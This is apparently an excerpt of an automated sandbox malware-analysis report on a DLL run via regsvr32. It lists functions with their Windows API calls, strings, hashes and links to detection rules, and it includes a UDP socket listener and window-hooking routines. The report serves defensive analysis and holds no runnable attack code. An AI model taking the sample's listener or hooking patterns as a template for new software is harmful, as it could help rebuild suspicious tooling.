Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ___getlocaleinfo
String ID:
API String ID: 1937885557-0
Opcode ID: 140fc5ec8b9a87e1cb2285073580b9a6ca86accc3e2e9ca1bcb8d5ec2949de64
Instruction ID: b04c4d7f6a57d8df90e79b3f21b47685716bac7d418787b81275d3872e324d7c
Opcode Fuzzy Hash: 140fc5ec8b9a87e1cb2285073580b9a6ca86accc3e2e9ca1bcb8d5ec2949de64
Instruction Fuzzy Hash: 0DE1DDB294060DBEEF12CAE1CC85DFFB7BDFB04744F14096AB255E6041EA71AB059B60

Uniqueness

Uniqueness Score: -1.00%

Function 10001160, Relevance: 10.6, APIs: 7, Instructions: 71networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,?), ref: 10001194
_memset.LIBCMT ref: 100011A8
htonl.WS2_32(00000000), ref: 100011C1
htons.WS2_32(?), ref: 100011D5
socket.WS2_32(00000002,00000002,00000000), ref: 100011EB
bind.WS2_32(?,?,00000010), ref: 10001210
setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 10001252

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
String ID:
API String ID: 1003240404-0
Opcode ID: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
Instruction ID: 8b71fe392eebb4791ef10e00b80357e65c28fbed0d3ec8f38f9f26760835bea4
Opcode Fuzzy Hash: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
Instruction Fuzzy Hash: D6317C74A01228AFE760CB54CC85BE9B7B4FF8A714F0041D8E949AB281CB71AD80DF55

Uniqueness

Uniqueness Score: -1.00%

Function 1001DFC0, Relevance: 9.1, APIs: 6, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32 ref: 1001DFE3

Part of subcall function 10024266: __EH_prolog3.LIBCMT ref: 1002426D
Part of subcall function 10024266: BeginPaint.USER32(?,?,00000004,10022D30,?,00000058,1001E0C9), ref: 10024299

SendMessageA.USER32 ref: 1001E031
GetSystemMetrics.USER32 ref: 1001E039
GetSystemMetrics.USER32 ref: 1001E044
GetClientRect.USER32 ref: 1001E05B
DrawIcon.USER32 ref: 1001E0AE

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MetricsSystem$BeginClientDrawH_prolog3IconIconicMessagePaintRectSend
String ID:
API String ID: 1007970657-0
Opcode ID: 3259dfba3eec98d8480867ab092ef1825236dcdbd4a97db3d006f8f0a7e1c205
Instruction ID: 44eb2ef316f0b933980e992ec3fa30d6a4f6e9fba2b57c8abd37e2d05c6bd9c1
Opcode Fuzzy Hash: 3259dfba3eec98d8480867ab092ef1825236dcdbd4a97db3d006f8f0a7e1c205
Instruction Fuzzy Hash: 4A31EA75A00119DFDB24CFA8C985FAEBBB5FB48300F108299E549E7241DA30AE84DF54

Uniqueness

Uniqueness Score: -1.00%

Function 1002129B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

_strcpy_s.LIBCMT ref: 100212CD

Part of subcall function 100210FF: __CxxThrowException@8.LIBCMT ref: 10023B71
Part of subcall function 100210FF: __cftof.LIBCMT ref: 10023B88

Part of subcall function 10030D24: __getptd_noexit.LIBCMT ref: 10030D24

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 100212E5
__snwprintf_s.LIBCMT ref: 1002131A
LoadLibraryA.KERNEL32(?), ref: 10021355

Strings

LOC, xrefs: 100212C5

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Exception@8InfoLibraryLoadLocaleThrow__cftof__getptd_noexit__snwprintf_s_strcpy_s
String ID: LOC
API String ID: 1016519223-519433814
Opcode ID: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
Instruction ID: e5882df6752d869781cd97db702e75e799ef83d3d4dcb43d327d0f518dc3dfd8
Opcode Fuzzy Hash: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
Instruction Fuzzy Hash: A021063990121CAFDB11EBA0EC46BDD33EEEB05751F9004A1FA04DB491DB70AE45C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 1002DB0D, Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 10031D3A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10031D4F
UnhandledExceptionFilter.KERNEL32(10049478), ref: 10031D5A
GetCurrentProcess.KERNEL32(C0000409), ref: 10031D76
TerminateProcess.KERNEL32(00000000), ref: 10031D7D

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 71874975056eb2054f9aced908419e2b906654dc85cf8b7fbf46a45a6eae212a
Instruction ID: eb2889493d924e234dee94db6a5018ee6042f58a5b7914c10149dcbc3be7d463
Opcode Fuzzy Hash: 71874975056eb2054f9aced908419e2b906654dc85cf8b7fbf46a45a6eae212a
Instruction Fuzzy Hash: C8219AB8C01A24DFF742DF68DDC96883BB4FB1C345F52102AE9088B665E7B06985CF15

Uniqueness

Uniqueness Score: -1.00%

Function 10027958, Relevance: 6.0, APIs: 4, Instructions: 42keyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB

GetKeyState.USER32 ref: 1002797E
GetKeyState.USER32 ref: 10027987
GetKeyState.USER32 ref: 10027990
SendMessageA.USER32 ref: 100279A6

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: a9509507a0c3cd732412f6ac1bfcc6ca4a4eab2c6e7fc2ddd7a5ec5eb68b4cea
Instruction ID: a80f2be592eaa4d0f51a0e10a6f75c43a55355dd3138243e3a8160c71d5bf3bd
Opcode Fuzzy Hash: a9509507a0c3cd732412f6ac1bfcc6ca4a4eab2c6e7fc2ddd7a5ec5eb68b4cea
Instruction Fuzzy Hash: 0AF0E93A7C035B66EA10E6707C81F950814FF45BD4FC11431BF49EA1D2DFA0C89119B0

Uniqueness

Uniqueness Score: -1.00%

Function 10021183, Relevance: 4.5, APIs: 3, Instructions: 40COMMON

Download Yara Rule

APIs

LoadResource.KERNEL32(00000000,?,?,1002120D,00000000,00000000,?,?,1002189A,00000000,?,?,?,?,10021950,00000000), ref: 1002118E
LockResource.KERNEL32(00000000,?,?,1002120D,00000000,00000000,?,?,1002189A,00000000,?,?,?,?,10021950,00000000), ref: 1002119C
SizeofResource.KERNEL32(00000000,?,?,1002120D,00000000,00000000,?,?,1002189A,00000000,?,?,?,?,10021950,00000000), ref: 100211AE

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$LoadLockSizeof
String ID:
API String ID: 2853612939-0
Opcode ID: 8b420e262c7312fbbd320bda05a88a884026fa2b8a5d750ea2b9a6c299d0f1d4
Instruction ID: 5885e8a255633e1cc81cd5e62f2e9d9df206611330dfebe0406f5a0ab521e5b9
Opcode Fuzzy Hash: 8b420e262c7312fbbd320bda05a88a884026fa2b8a5d750ea2b9a6c299d0f1d4
Instruction Fuzzy Hash: 7FF0F03A60013BA7CF219F69FC044E97BD5FF107E67414425FEA9C2060E231D870D680

Uniqueness

Uniqueness Score: -1.00%

Function 100250A3, Relevance: 4.5, APIs: 3, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d3cc7cabb4d58ad44b84df687ee6d4ed92987b137f1ec63db657d71093bb1ad
Instruction ID: 0d7c4b7ad1d73a1697217a780c63f05e975ccc5f711293de909a3a3b9b9d2103
Opcode Fuzzy Hash: 8d3cc7cabb4d58ad44b84df687ee6d4ed92987b137f1ec63db657d71093bb1ad
Instruction Fuzzy Hash: 16F0A431600109ABDF11DF60DD88A9E7FB8FF05346F908021FC1AC5061DB32CA55EB99

Uniqueness

Uniqueness Score: -1.00%

Function 10024F01, Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 10024F24
GetVersionExA.KERNEL32(?), ref: 10024F3D

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Version_memset
String ID:
API String ID: 963298953-0
Opcode ID: 261500b53b9fbffb2ab7006eb20860b792d5709bcfa83feeb3a436b21e339e9d
Instruction ID: 60a6db508766d0176de5257cd9c04f851b8e12d18597fbeb5363c1cc45f9d795
Opcode Fuzzy Hash: 261500b53b9fbffb2ab7006eb20860b792d5709bcfa83feeb3a436b21e339e9d
Instruction Fuzzy Hash: 54F065799002189FEB50DB74DD46B8E77F8AB04304F9144E5950DD3282EA70AA48CB41

Uniqueness

Uniqueness Score: -1.00%

Function 10001280, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

recvfrom.WS2_32(?,?,00000400,00000000,?,00000010), ref: 100012CF

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: recvfrom
String ID:
API String ID: 846543921-0
Opcode ID: cdd5b8fa6bd2be514b31e1496784718f03a02615474b077ae9b11ea931df357f
Instruction ID: 69fb0fddd724ab168ece224e86e76236123086ad7b1ad86b3e1ae6067053412b
Opcode Fuzzy Hash: cdd5b8fa6bd2be514b31e1496784718f03a02615474b077ae9b11ea931df357f
Instruction Fuzzy Hash: 1B0125B5A0011C9FDB14CF58CD54BEEBBB9FF88304F4045A9E609A7241D7B46A84CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 10028DEC, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 10028DF6

Part of subcall function 1002B0BB: __EH_prolog3.LIBCMT ref: 1002B0C2

CallNextHookEx.USER32 ref: 10028E3A

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

GetClassLongA.USER32 ref: 10028E7E
GlobalGetAtomNameA.KERNEL32 ref: 10028EA8
SetWindowLongA.USER32 ref: 10028EFD
_memset.LIBCMT ref: 10028F47
GetClassLongA.USER32 ref: 10028F77
GetClassNameA.USER32(?,?,00000100), ref: 10028F98
GetWindowLongA.USER32 ref: 10028FBC
GetPropA.USER32 ref: 10028FD6
SetPropA.USER32(?,AfxOldWndProc423,?), ref: 10028FE1
GetPropA.USER32 ref: 10028FE9
GlobalAddAtomA.KERNEL32 ref: 10028FF1
SetWindowLongA.USER32 ref: 10028FFF
CallNextHookEx.USER32 ref: 10029017
UnhookWindowsHookEx.USER32(?), ref: 1002902B

Strings

AfxOldWndProc423, xrefs: 10028FCF, 10028FD4, 10028FDF, 10028FE7, 10028FF0
ime, xrefs: 10028EB1
#32768, xrefs: 10028F59, 10028F5E, 10028FA8

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423$ime
API String ID: 867647115-4034971020
Opcode ID: 028737d45415cf4fc653e4401d117fb93ecf855678ad16e5d4e8c367e2bfe641
Instruction ID: c9f41a1409c6bb8d0fa3b18bb25e3997143979ac063bd30542687b89172f9a1c
Opcode Fuzzy Hash: 028737d45415cf4fc653e4401d117fb93ecf855678ad16e5d4e8c367e2bfe641
Instruction Fuzzy Hash: 2361027590122AAFDB11DF61DD88B9E7BB8FF093A1F920154F509E6191DB30DE80CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 100214CB, Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 158libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 100214D5
GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
ConvertDefaultLocale.KERNEL32(?), ref: 10021555
ConvertDefaultLocale.KERNEL32(?), ref: 10021563
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 100215CD
EnumResourceLanguagesA.KERNEL32 ref: 100215EA
ConvertDefaultLocale.KERNEL32(?), ref: 1002161D
ConvertDefaultLocale.KERNEL32(00000000), ref: 10021626
GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669
_memset.LIBCMT ref: 10021689

Strings

kernel32.dll, xrefs: 100214EE
GetUserDefaultUILanguage, xrefs: 1002150D
GetSystemDefaultUILanguage, xrefs: 10021565
ntdll.dll, xrefs: 100215C8

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 3537336938-2299501126
Opcode ID: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
Instruction ID: 3754a4cc769aa270db1ce7901eb040107ed5b3d0b04ae9dca27c5b132e5f9257
Opcode Fuzzy Hash: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
Instruction Fuzzy Hash: 77515974C002289BCB61DF659C44BEDBAF4EB59300F5002EAE988E3291DB749E81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 10024F5B, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,745F5D80,100250B0,?,?,?,?,?,?,?,10026FEC,00000000,00000002,00000028), ref: 10024F86
GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,10026FEC,00000000,00000002,00000028), ref: 10024FA2
GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,10026FEC,00000000,00000002,00000028), ref: 10024FB3
GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,10026FEC,00000000,00000002,00000028), ref: 10024FC4
GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,10026FEC,00000000,00000002,00000028), ref: 10024FD5
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,10026FEC,00000000,00000002,00000028), ref: 10024FE6
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,10026FEC,00000000,00000002,00000028), ref: 10024FF7
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,10026FEC,00000000,00000002,00000028), ref: 10025008

Strings

USER32, xrefs: 10024F7C
MonitorFromRect, xrefs: 10024FBE
GetSystemMetrics, xrefs: 10024F9C
MonitorFromPoint, xrefs: 10024FCF
MonitorFromWindow, xrefs: 10024FAD
EnumDisplayMonitors, xrefs: 10024FE0
GetMonitorInfoA, xrefs: 10024FF1
EnumDisplayDevicesA, xrefs: 10025002

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: 2c2d105ab76555674e553128ad85fc5a2fe8f9f5109b4f1e6913bbfff899dba8
Instruction ID: f18cf552d00ebf4573e19fd52f8b2344fe61d2491b1b7e62cf44cba2888c0d7d
Opcode Fuzzy Hash: 2c2d105ab76555674e553128ad85fc5a2fe8f9f5109b4f1e6913bbfff899dba8
Instruction Fuzzy Hash: 15213672D10170ABE752EF749DC886D7AF8F64C2827A1083FE302DA12AD7724540DF98

Uniqueness

Uniqueness Score: -1.00%

Function 10026EFC, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 175windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB

GetParent.USER32(?), ref: 10026F2B
SendMessageA.USER32 ref: 10026F4E
GetWindowRect.USER32 ref: 10026F68
GetWindowLongA.USER32 ref: 10026F7E
CopyRect.USER32 ref: 10026FCB
CopyRect.USER32 ref: 10026FD5
GetWindowRect.USER32 ref: 10026FDE
CopyRect.USER32 ref: 10026FFA

Strings

(, xrefs: 10026F94

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: (
API String ID: 808654186-3887548279
Opcode ID: ffd55680436a5d28903850f20e835ec9a2371b9025f3b79a50c4d24cc647ab29
Instruction ID: 79398ab63d643b80669917eeb3518c0a7ae9ea55fdc53564aac6bb8538d6af80
Opcode Fuzzy Hash: ffd55680436a5d28903850f20e835ec9a2371b9025f3b79a50c4d24cc647ab29
Instruction Fuzzy Hash: 08513C72900219AFDB01CBA8EE85AEEBBB9FF48350F554125F909F3251DB30ED458B64

Uniqueness

Uniqueness Score: -1.00%

Function 10034610, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,1004E800,0000000C,1003474B,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 10034622
__crt_waiting_on_module_handle.LIBCMT ref: 1003462D

Part of subcall function 1003065C: Sleep.KERNEL32(000003E8,00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 10030668
Part of subcall function 1003065C: GetModuleHandleW.KERNEL32(00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F,?), ref: 10030671

GetProcAddress.KERNEL32(00000000,EncodePointer,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880,00000000,00000000), ref: 10034656
GetProcAddress.KERNEL32(00000000,DecodePointer,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880,00000000,00000000), ref: 10034666
__lock.LIBCMT ref: 10034688
InterlockedIncrement.KERNEL32(?), ref: 10034695
__lock.LIBCMT ref: 100346A9
___addlocaleref.LIBCMT ref: 100346C7

Strings

DecodePointer, xrefs: 1003465E
EncodePointer, xrefs: 1003464A
KERNEL32.DLL, xrefs: 1003461C, 10034621, 1003462C

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
